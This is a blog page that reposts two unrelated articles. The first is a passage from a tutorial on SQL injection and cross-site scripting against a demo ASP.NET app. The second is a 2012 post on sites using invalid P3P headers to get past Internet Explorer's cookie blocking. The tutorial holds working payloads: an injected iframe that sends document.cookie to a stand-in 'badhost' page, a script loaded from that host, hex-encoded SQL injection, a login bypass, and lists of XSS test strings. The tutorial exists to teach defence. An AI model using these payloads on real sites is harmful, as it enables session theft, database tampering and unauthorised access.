The script will embed an IFRAME on to the page and pointing to http://localhost:9997/badhost/cookiemonster.aspx with a query string parameter “c”. This parameter holds the cookies value created by the “SQLInjection_XSS_Demo” application. To demonstrate this, I created few cookies on the LoginPage.aspx. The cookiemonster.aspx will record all the cookies names and values in the CookieJar.txt.

Listing 22

void FakeCookies()
  {
  Response.Cookies["email"].Value = "bryian.tan@mydomain.com";
  Response.Cookies["email"].Expires = DateTime.Now.AddDays(1);
  Response.Cookies["age"].Value = "22";
  Response.Cookies["age"].Expires = DateTime.Now.AddDays(1);
  }

After executing the above URL, we will see the below entries in the CookieJar.txt.

Figure 12
Cookies list

So what? What is the attacker going to do with my cookies information? Let say the page will store some information in the cookies after successful login attempt. Login using one of the username found in the tbl_users table then refresh the web page. The page will pull out some information from the cookies and display the results on to the page. See below.

Figure 13
Data from Cookies

Update table with malicious script

We already know the tables and columns name from the previous example. Execute the URL shown in listing 23 to update the MyComment table with a JavaScript to tamper the cookies. This script will inject a script into the cookies value. Then navigate to the ListComments.aspx page to trigger the script and navigate back to LoginPage.aspx. You should see a popup message “XSS from bad host” indicates that the script was successfully executed by the browser.

Listing 23

http://localhost:1234/Sample/ListComments.aspx?cid=1 UPDATE MyComments SET Comment = %27<script>c=”\<script src=\”http://localhost:9997/badhost/maliciousscript.js\”><\/script>”; document.cookie = “email=”%2bc;</script> test %27 WHERE id =1 –

Let append some malicious scripts to the MyComment table. Execute the URL shown below.

Listing 24

http://localhost:1234/Sample/ListComments.aspx?cid=1 %55%50%44%41%54%45%20%4D%79%43%6F%6D%6D%65 %6E%74%73%20%53%45%54%20%4E%61%6D%65%3D%27%3C%73%63%72%69%70%74%20%73% 72%63%3D%22%68%74%74%70%3A%2F%2F%6C%6F%63%61%6C%68%6F%73%74%3A%39%39%3 9%37%2F%62%61%64%68%6F%73%74%2F%6D%61%6C%69%63%69%6F%75%73%73%63%72%69 %70%74%2E%6A%73%22%3E%3C%2F%73%63%72%69%70%74%3E%27%20%2D%2D

The URL string highlighted in grey, which when decoded, will becomes

Listing 25

http://localhost:1234/Sample/ListComments.aspx?cid=1 UPDATE MyComments SET Name=’<script src=”http://localhost:9997/badhost/maliciousscript.js”></script>’ –

Refresh the page, and we will see a popup message shown below. This indicates that the malicious script crafted by the attacker was successfully executed by the browser.

Figure 14
XSS from bad host

The URL shown below will embed a HTML IFrame on to the page and will trigger the cookiemonster.aspx page every time a user navigates to the ListComments.aspx page. Execute it, navigate to ListComments.aspx page and observe that new contents are being appended to the CookieJar.txt file without a trace or warning message.

Listing 26

http://localhost:1234/Sample/ListComments.aspx?cid=1 UPDATE MyComments SET Name= ‘<script>var s=”<IFRAME style=display:none SRC=http://localhost:9997/badhost/cookiemonster.aspx? c=”%2bescape(document.cookie)%2b”><\/IFRAME>”;document.write(s)</script>’ –

 

Quick test

Append any of the below string highlighted in grey to your web pages URL that take parameters. If you see a pop-up message, then the web page is subjected to Cross-Site Scripting attack.

• http://localhost:1234/Sample/LoginPage.aspx?strErr=”><scrIpt>alert(“XSS”)</scriPt>
• http://localhost:1234/Sample/LoginPage.aspx?strErr=%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%22%58
%53%53%22%29%3C%2F%73%63%72%69%70%74%3
• http://localhost:1234/Sample/LoginPage.aspx?strErr=</TITLE><sCRIPT>alert(“XSS”);</SCRIPt>
• http://localhost:1234/Sample/LoginPage.aspx?strErr=<BODY%20ONLOAD=alert(“XSS”)>
• http://localhost:1234/Sample/LoginPage.aspx?strErr=”><iFRAME%20SRC=”javascript:alert(‘XSS’);”></IFRaME>

Forms input

SQL Injection

We can bypass the login page by simply adding ‘ or 1=1 – to the login id and place any value in the password field. See example below.

Figure 15
SQL Injection login screen

If there are no maximum number of characters defined on the TextBox, the attacker can append the SQL statement mentioned above to the form input’s value. Let’s say we have a page to update the comment and I update the comment with the value shown below. We should see a new entry in the tbl_SQLInjection table after the update.

Listing 27

‘; DECLARE @S VARCHAR(500) SET @s=
CAST(0x4946204f424a4543545f4944282774626c5f53514c496e6a656374696f6e2
72c27552729204953204e554c4c20435245415445205441424c452064626f2e5b746
26c5f53514c496e6a656374696f6e5d285b4f75747075745d205b766172636861725
d2835303029204e554c4c2920494e5345525420494e544f2064626f2e74626c5f535
14c496e6a656374696f6e2053454c454354202770616765202d205375626a6563742
0746f2053514c20496e6a656374696f6e27 as VARCHAR(500))Exec(@s)–

Next, I’ll demonstrate a simple way an attacker can update every column in the table with the same value. Let’s update the Name value with hacked ‘;–

Figure 16
Update column value to hacked

Retrieve all the rows from the MyComments table and witness that all the value in name column were updated to “hacked”. As mentioned earlier, the two consecutive hyphens “–” indicates the SQL comments, the query statement after the hyphens will not evaluated by the SQL server. Please make sure to backup the database before replicating this demonstration.

Figure 17
form injection update

Cross-Site Scripting

Cross-Site Scripting enables malicious attackers to inject client-side script or HTML markup into web pages viewed by other users. This can happen through the input form. Update the comment with the string “<script src=”http://localhost:9997/badhost/maliciousscript.js”></script>“. You should see a pop-up message when you navigate toListComments.aspx page.

Figure 18
Update form with XSS

Quick Test

Update the form value with any of the string listed below and observe the outcome. Make sure the string is in one line and no line break. If the JavaScript executes successfully by the browser or displays unexpected result then the web page is subjected to Cross-Site scripting.

• <BODY ONLOAD=”javascript:window.location=”http://www.google.com””>
• <BODY ONLOAD=”javascript:alert(”XSS”)”>
• <p onmouseover=javascript:window.location=”http://www. google.com”;>test
• <p onmousemove=javascript:window.location=”http://www. google.com”;>test
• <p onMouseDown=javascript:window.location=”http://www.google.com”;>test
• <span onmouseover=javascript:window.location=”http://www. google.com”;>test</span>
• <span onmousemove=javascript:window.location=”http://www.google.com”;>test</span>
• <h2 onmouseover=javascript:window.location=”http://www.google.com”;>test
• <div onmouseover=javascript:window.location=”http://1208929383″;>test
• <meta http-equiv=”refresh” content=”1; URL=http://1208929383″>
• <b onmouseover=javascript:window.location=”http://www.google.com”; >test
• <img onmouseover=javascript:window.location=”http://www.google.com”;>
• <img src=http://www.google.com/images/srpr/nav_logo14.png width=”1″ height=”1″ onLoad=javascript:window.location=”http://www.google.com”;>
• <div style=”width:100%” onresize=javascript:window.location=”http://www.google.com”;>test</div> (Resize the browser to see the behavior)
• <tt style=”width:100%” onmousemove=javascript:window.location=”http://www.google.com”;>test
• <PLAINTEXT> test
• <object> test
• <applet> test
• <textarea> test
• <title> test
• <table> test
• <style> test
• <noscript> test

JavaScript Event Injection vulnerability

The JavaScriptFunctionInjection.aspx page contains two examples on how to replicate the JavaScript Event Injection vulnerability using ASP.NET inline tag and client-side input control. The first example is using single quote and the second example is using quote. See figure 19. This vulnerability will work with ASP.NET TextBox control if the ValidateRequest is set to false. Copy one of the sample test input and hit the submit button (see figure 19).

Figure 19
JavaScript Event injection example
Type something in the input box and you should see the result similar to figure 20. Note: The output from the first example was encoded and the single quote was replaced with double single quote on purpose.

Figure 20
JavaScript Event injection result
What is going on? We have encoded the output and replaced the single quote with double quote! Let take a closer look at the HTML markup code. The JavaScript Event was successfully being injected to the first example but treated as a string by the second example. The HtmlEncode method did not escape the single quote but the quote correctly. I would suggest avoiding wrapping the ASP.NET inline code in between the single quote. Don’t forget to test the second example. The output from the second example was not being encoded on purpose.

Listing 28

<input id="Text1" name="Text1" type="text" value='a''
    onKeyDown=alert("gotcha+onKeyDown") '''  />
 
<input id="Text2" name="Text2" type="text" value="a''
    onKeyDown=alert("gotcha+onKeyDown") ''" />

Point of interest

Do not rely solely on client-side validation (JavaScript)

The attacker can bypass the client-side validation by disabling the JavaScript in web browsers. Do not depend exclusively on JavaScript to search and replace potentially dangerous HTML statement or SQL Injection keywords. Make sure to revalidate the user inputs at the server-side. I know is a lot of work, but for the sake of security we have to do it. In the add comment section, the page is using the JavaScript to check for blank fields. Try to disable the JavaScript on your browser and add the comment again. Click here to learn on how to disable and enable the JavaScript.

Replacing single quotation mark (‘) with two single quotation mark (”)

I saw some web site mentioning that SQL Injection vulnerability can be prevented by simply replacing single quotation mark with double quotation mark. That not always the case, the attackers still able to inject the SQL table with malicious script or HTML markup without the single quotation mark. Malicious users can bypass the filter by using different character encoding, please refer to “How To: Prevent Cross-Site Scripting in ASP.NET“, table 1.

Inline Code/tags

There are several ways to display information from an ASP.NET program. We can display information in the page using an embedded code block. <% … %> or using <%= … %> construction. Another way is to use data-binding syntax <%# … %> to bind control property values to data and specify values for retrieving, updating, deleting, and inserting data. Make sure to apply either the HttpUtility.HtmlEncode or Server.HtmlEncode methods to encode the form data and other client request before displaying it in the web page. This will help prevent possible Cross-Site Scripting injection attacks. With ASP.NET 4.0, the new <%: … %> code nugget-syntax will automatically HTML encode the output before it is rendered.

Stored procedure

I’m using stored procedure in my web application, are stored procedures immune to SQL Injection attacks? The answer is “it depends”. If we are using dynamic SQL statements within stored procedure then it might open to SQL Injection attacks. Shown below is the stored procedure with dynamic SQL statement in it.

Figure 21
Dynamic SQL
Update the comment field with the value ha ha ha’;–. The “Update using inline query” and “Update using SP – Dynamic Query” button will update every comment field in the table with the specified value. On the other hand, the “Update using SP” button will only update the current record.

Figure 22
Update comment

Request validation (ASP.NET)

Please note that the ValidateRequest attribute in the @page directive is set to false on purpose to emulate the Classic ASP environment and prevent the .NET framework from throwing the error (“A potentially dangerous Request.Form value was detected from the client”). If you happen to come across this error message in your application, rethink the business logic or page architecture before disabling the request validation.

More reading/ Prevent SQL Injection and Cross-Side Scripting

Adding Cross-Site Scripting Protection to ASP.NET 1.0
ASP.NET 2.0 Security Best Practices – Must Read Article on MSDN
How To: Prevent Cross-Site Scripting in ASP.NET
Security Practices: ASP.NET Security Practices at a Glance
SQL Injection
SQL Injection General Guidance
Stop SQL Injection Attacks Before They Stop You

Conclusion

I hope someone will find this information useful. If you find any bugs or disagree with the contents, please drop me a line and I’ll work with you to correct it. I would suggest downloading the demo and explore it in order to grasp the full concept of it. Please send me an email if you want to help improve this article.

Resources

ASCII/HEX/HTML table
Cross Site Scripting
Data-Binding Expressions Overview
How To: Prevent Cross-Site Scripting in ASP.NET
SQL Injection cheat sheet
SQL Injection Walkthrough
String to hex
XType Datatype

Downloads

Download

Source http://blog.ysatech.com/post/2010/08/16/SQL-Injection-and-Cross-Site-Scripting.aspx

527 views
728x90
posted by 블르샤이닝 2012. 2. 21. 15:46
728x90

Facebook and many other sites also bypass Internet Explorer privacy controls

 #

There is a post today on a Microsoft MSDN blog about how Google bypasses third-party cookie control in Internet Explorer by setting a false P3P header. The post author is Dean Hachamovitch, who is the VP for IE, and follows up from a big story last week about how Google and a number of other ad networks are bypassing third-party cookie blocking in Safari by using a workaround (the workaround involves an IFRAME and a form that is submitted automatically using Javascript).

The case with IE is different. Google (and many other sites) are taking advantage of the P3P protocol (a privacy extension to HTTP) to set third-party cookies. Here is a summary of what Google is doing, from the article:

By default, IE blocks third-party cookies unless the site presents a P3P Compact Policy Statement indicating how the site will use the cookie and that the sites use does not include tracking the user.

Here is what a valid P3P header looks like, as set by microsoft.com:

$ nc microsoft.com 80
HEAD / HTTP/1.1
Host: www.microsoft.com

HTTP/1.1 301 Moved Permanently
Connection: close
Date: Tue, 21 Feb 2012 04:29:06 GMT
Server: Microsoft-IIS/6.0
P3P: CP='ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI'
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
Location: http://www.microsoft.com
Content-Length: 23
Content-Type: text/html
Cache-control: private

If an invalid P3P header is set, or a header that doesn't state policy, Internet Explorer will by default accept the third-party cookies (this doesn't happen in IE9). This is what the P3P header looks like for google.com:

P3P: CP="This is not a P3P policy! See http://www.google.com/support/accounts/bin/answer.py?hl=en&answer=151657 for more info."

Not mentioned in the Microsoft article is that Facebook are also setting an invalid header ('invalid' may not be the right terminology here, but they are setting a header that does not contain valid privacy policies). This results in Internet Explorer (pre version 9) accepting the third-party cookies.

From facebook.com:

$ nc facebook.com 80
GET / HTTP/1.1
Host: www.facebook.com

HTTP/1.1 302 Found
Location: http://www.facebook.com/common/browser.php
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Set-Cookie: datr=FxdDTzq9li7A7DRTAxVSXaZN; expires=Thu, 20-Feb-2014 04:01:27 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Debug: 8V3X/HiIi+1PrEZFy4c8LpavYxpBvnsojJ+pcYyGJUg=
X-Cnection: close
Date: Tue, 21 Feb 2012 04:01:27 GMT
Content-Length: 0

The reason Facebook gives for this header in the page that is linked from it is:

The organization that established P3P, the World Wide Web Consortium, suspended its work on this standard several years ago because most modern web browsers do not fully support P3P. As a result, the P3P standard is now out of date and does not reflect technologies that are currently in use on the web, so most websites currently do not have P3P policies.

Microsoft explicitly called out Google for their behaviour but either neglected to mention or didn't investigate Facebook (skeptics may believe that this is because of Microsoft's shareholding in Facebook and their partnerships in search and advertising (HT ashk4n)).

If Google is being asked to set proper P3P headers (and it appears that they have already altered at least some of their servers) then Facebook should also he held to the same standard.

We plan on surveying other popular sites to find who else is taking advantage of this loophole in P3P and its implementation to bypass third-party cookie controls in earlier Internet Explorer versionsUpdate: see below. I plan on running a more thorough survey of the top domains.

Survey of other sites

I looked up the Shodan Research HTTP archive to estimate how many other sites are bypassing Internet Explorer privacy controls for third-party cookies by setting an invalid P3P policy.

The database contains all the HTTP headers for the top 10,000 websites according to Alexa. The relevant headers (P3Pp3p, etc.) show that almost 500 sites are setting invalid P3P headers - almost a full 5% of the top 10,000 web servers surveyed.

header : 두목, 수령, 소·양떼를 유도하는 개, 거꾸로 뛰어듦, 거꾸로 떨어짐
728x90